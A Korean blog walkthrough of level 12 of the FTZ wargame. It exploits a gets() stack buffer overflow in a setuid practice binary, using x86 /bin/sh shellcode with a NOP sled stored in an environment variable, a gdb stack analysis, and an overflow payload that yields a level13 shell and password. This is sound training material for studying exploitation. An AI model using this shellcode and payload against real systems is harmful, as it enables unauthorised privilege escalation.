[FTZ] level12 풀이

May 9, 2022 1 분 소요

💡 FTZ level12 풀이

문제

계정 : level12/it is like this

hint

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main( void )
{
        char str[256];

        setreuid( 3093, 3093 );
        printf( "문장을 입력하세요.\n" );
        gets( str );
        printf( "%s\n", str );
}

풀이

11번과 동일하게 bof 취약점을 이용해서 리턴 주소를 SHELLCODE 주소로 바꿔줍니다.

쉘 코드는 환경 변수에 담아 줍니다. 쉘 코드 위치가 몇 바이트씩 오차가 생기기 때문에 맨 앞에 nop 문자를 담아서 오류를 최소화 해줍니다.

[level12@ftz level12]$ export SHELLCODE=$(python -c 'print("\x90"*30 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")')

환경 변수의 메모리 주소를 구해줍니다.

env.c

int main(){
  printf("%p\n",getenv("SHELLCODE"));
}

컴파일 후 실행하여 SHELLCODE 환경변수의 주소를 구합니다.

[level12@ftz tmp]$ gcc -o env env.c
[level12@ftz tmp]$ ./env
0xbffffc0f

환경 변수의 주소는 0xbffffc0f입니다.

이제 bof 취약점을 발생시키기 위해서 gdb로 메모리 구조를 분석합니다.

[level12@ftz level12]$ gdb -q attackme
(gdb) set disass intel
(gdb) disass main
Dump of assembler code for function main:
0x08048470 <main+0>:    push   ebp
0x08048471 <main+1>:    mov    ebp,esp
0x08048473 <main+3>:    sub    esp,0x108    //str[256]할당
0x08048479 <main+9>:    sub    esp,0x8
0x0804847c <main+12>:   push   0xc15
0x08048481 <main+17>:   push   0xc15
0x08048486 <main+22>:   call   0x804835c <setreuid>
0x0804848b <main+27>:   add    esp,0x10
0x0804848e <main+30>:   sub    esp,0xc
0x08048491 <main+33>:   push   0x8048538
0x08048496 <main+38>:   call   0x804834c <printf>
0x0804849b <main+43>:   add    esp,0x10
0x0804849e <main+46>:   sub    esp,0xc
0x080484a1 <main+49>:   lea    eax,[ebp-264]
0x080484a7 <main+55>:   push   eax
0x080484a8 <main+56>:   call   0x804831c <gets>
0x080484ad <main+61>:   add    esp,0x10
0x080484b0 <main+64>:   sub    esp,0x8
0x080484b3 <main+67>:   lea    eax,[ebp-264]
0x080484b9 <main+73>:   push   eax
0x080484ba <main+74>:   push   0x804854c
0x080484bf <main+79>:   call   0x804834c <printf>
0x080484c4 <main+84>:   add    esp,0x10
0x080484c7 <main+87>:   leave
0x080484c8 <main+88>:   ret
0x080484c9 <main+89>:   lea    esi,[esi]
0x080484cc <main+92>:   nop
0x080484cd <main+93>:   nop
0x080484ce <main+94>:   nop
0x080484cf <main+95>:   nop
End of assembler dump.

gdb 실행 결과를 보니 스택은 다음과 같이 되어 있습니다.

ret (4)
ebp (4)
dummy (8)
str (256)

따라서 str에 268바이트 만큼 덮어쓴 뒤 마지막 4바이트에 환경변수 주소로 ret 주소를 덮어 써 줍니다.

[level12@ftz level12]$ (python -c 'print("A"*268+"\x0f\xfc\xff\xbf")';cat) | ./attackme
문장을 입력하세요.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA??

id
uid=3093(level13) gid=3092(level12) groups=3092(level12)

my-pass

Level13 Password is "have no clue".

쉘을 획득했습니다.

Twitter Facebook LinkedIn

Kang MyoungSeok

[FTZ] level12 풀이

문제

풀이

공유하기

댓글남기기

참고

[Hack The Box] Photobomb 풀이

[Hack The Box] Squashed 풀이

[Hack The Box] Shoppy 풀이

[Hack The Box] Ambassador 풀이